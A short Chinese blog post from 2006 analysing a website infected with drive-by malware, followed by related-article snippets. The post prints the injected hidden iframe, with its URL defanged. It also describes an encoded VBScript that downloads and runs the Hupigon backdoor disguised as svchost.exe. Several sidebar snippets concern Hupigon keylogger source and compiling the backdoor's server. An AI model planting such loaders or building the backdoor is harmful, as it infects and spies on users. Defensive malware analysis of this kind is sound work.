一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

最新推荐文章于 2024-09-01 09:00:00 发布
最新推荐文章于 2024-09-01 09:00:00 发布 · 145 阅读 · 0
文章标签:

#shell

本文分析了一个网站被植入恶意代码的情况,恶意代码通过隐藏的iframe进行加载,使用了加密的VBScript来下载并运行一个名为Backdoor.Win32.Hupigon.cge的木马程序。

endurer 原创

2006-11-22 第1

该网站首页首部被加入代码:
/-----------
<IFRAME src="hxxp://58***000.128**.to***for.com/x***skj.htm width=0 height=0></IFRAME>
-----------/


x***skj.htm 的内容为escape()加密的VBScript代码,功能为:利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 setup.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

setup.exe 文件大小为301 KB (308,224 字节),Kaspersky 报为 Backdoor.Win32.Hupigon.cge

iteye_6637
关注
Backdoor.Win32.Rbot病毒专杀
02-17
重新启动,打开工具直接绿色运行,本工具是经过在xp系统上测试过的,没有问题,win7还没有测试
Backdoor.Win32.Hupigon.dsx专杀
06-14
【病毒名称】:Backdoor.Win32.Hupigon.dsx 【病毒类型】:后门 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 病毒运行后,首先修改该系统时间,致使一些杀软安软因系统时间不符...
灰鸽子键盘记录源码分析及一个中英文键盘记录代码
weixin_33739646的博客
11-15 588
灰鸽子键盘记录源码分析及一个中英文键盘记录代码 2006年11月21日 星期二 下午 3:11 首先是: var LogHook: HHook = 0; HookList: TStringList; 函数: function LogProc(iCode: Integer; wparam, lparam: LongInt): lresult; stdca...
鸽子灰鸽子源码_鸽子
cuyi7076的博客
06-28 1120
对你而言我是谁? 我最近在为笔记本电脑定价。 我听说过有关一家主要公司的笔记本电脑的好消息,所以我想我可以通过他们的在线商店来看看。 商店问我的第一件事是我是哪种类型的客户。 我的回答选项包括家庭和家庭办公室 , 小型企业和中型和大型企业 。 我冻结了 我是什么? 我是只想要一台笔记本电脑(家庭和家庭办公室)的人,还是中型和大型企业的雇员? 产品线和价格是否相同? 如果我想购买公司...
灰鸽子和源代码
半首催眠曲
03-25 6921
从其它地方下载仅供学习使用。 都是可读代码 先安装所有控件后,直接编译客户端和服务端,没有错误的情况下就可以直接运行了,如果有错误,用F8一直往下走,一直删除,直到最后编译成功。。不多说了。大家自己研究吧。。。源码是没有毒的,编译后的EXE是有毒的,不懂木马的朋友还是不要随便运行服务端,客户端没事!!
java灰鸽子代码_灰鸽子2007完整源代码+黑洞屏幕.rar
weixin_35607952的博客
03-01 2264
【实例简介】灰鸽子VIP2007开发源代码。有杀软会直接拦杀Cache文件夹下的CServer.dat文件。请使用时自行判别!【实例截图】【核心代码】4031d4c5-34ec-4d95-83db-d91d7ed6171c├── 2ccc.com.nfo├── code│ ├── client│ │ ├── AboutUnit.dfm│ │ ├── AboutUnit.pas│...
一起解剖灰鸽子VIP1.2源码
优快云1332531529的博客
03-22 442
从工程文件开始分析:program H_Client;uses Forms, windows, messages, Classes, Main in 'Main.pas' {HgzVip}, AboutUnit in 'AboutUnit.pas' {AboutForm}, UpIp in 'UpIp.pas' {UpIpDate}, SysInf in ...
Backdoor.Win32.Rbot病毒清除工具绿色版发布
从标题“Backdoor.Win32.Rbot病毒专杀”可以看出,该文件是一个专门用于清除 Backdoor.Win32.Rbot 病毒的杀毒工具。这种专杀工具通常是针对特定病毒家族或变种开发的,具有针对性强、查杀效率高的特点。与通用杀毒...
html.win32.scipt病毒,Win32/Induc.A是什么病毒该如何解决
weixin_42333370的博客
06-29 1062
Virus/Win32.Induc.a是这是Delphi感染型病毒,通过感染Delphi库文件中的SysConst.dcu文件,进而使Delphi编写的所有文件染毒,目前尚不知其危害,网上说其没有危害。 该病毒实际上并不具有危害性,只是其更改了库文件后使编译生成的所有程序均带有不正常代码,而其代码行为即为以上描述。 这个病毒具有二次感染能力,也就是说原来你编译出来的所有Delphi程序都可以再次感...
Backdoor.Win32.Delf.aws
03-29
Backdoor.Win32.Delf.aws 病毒样本。
收集的一些远控源码
10-02
收集的一些远控源码
灰鸽子
yes_angel的博客
09-01 1941
灰鸽子( Huigezi)又叫灰鸽子远程控制软件,原本该软件适用于公司和家庭管理,但因早年软件设计缺陷,被黑客恶意使用,曾经被误认为是一款集多种控制方式于一体的木马程序。 毒 运行过程 G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Ser
c语言编译是灰的,编译灰鸽子打造自己专用版C
weixin_31032799的博客
05-19 1130
编译灰鸽子打造自己专用版C所用工具:Delphi灰鸽子源代码+控件+皮肤文件(可以去冰兰网络下载)其它就没什么了1.安装灰鸽子控件因为要成功编译灰鸽子要安装好几个控件才能这让蔡鸟朋友们比较头痛其实很简单下面看我操作我们只要安装几个必要的控件就行了AnimationEffect.v2.2 动画窗口控件 先装这个DynamicSkinForm 5.90 皮肤控件(源码)HEXEDIT 二进程编...
远程访问型木马——灰鸽子软件的使用,零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
09-01 6595
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
c# 类似灰鸽子生成服务端方法
weixin_30606669的博客
08-22 404
  最近写一个类似与灰鸽子的演示软件,但是遇到一个问题就是程序生成客户端时如何动态的写入服务器的IP地址,按照惯例在百度上淘了一下发现这方面的代码较少。自己整理了一下! 1、首先是要生成客户端的代码写法: 预留出要写入IP的字符串,我们现在以20个“x”表示代码如下     string tempip = "xxxxxxxxxxxxxxxxxxxx";//...
灰鸽子远程管理软件 VIP 2007 Beta1_绿色简体中文测试版_综合三个版本优点
weixin_33694172的博客
03-31 258
灰鸽子远程管理软件 VIP 2007 Beta1_绿色简体中文测试版_综合三个版本优点 介面展示:[img]http://zyw365.com/soft/UploadPic/2007-2/2007223126974243.jpg[/img] ∷软件简介∷ 改进功能说明:1.VIP2007综合了现有的三个版本优点(VIP2006/1.23/2.03)2.安装文件从VIP...
遭遇“灰鸽子
午夜听风的代码人生
12-10 834
前不久写了个测试程序,在服务器开了8000端口,用来调试设备。本来端口号也就是随便想的,谁知道过了一会莫名奇妙连上来几十个连接,还发了一堆数据。看了一下数据,似乎是文本格式的某种协议,内容有计算机名称、操作系统类型、还有类似备注和密码之类的东西。google了一下才知道原来是大名鼎鼎的灰鸽子,大概是上次服务器被黑之黑客后被当作客户端在用。------------------------------
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值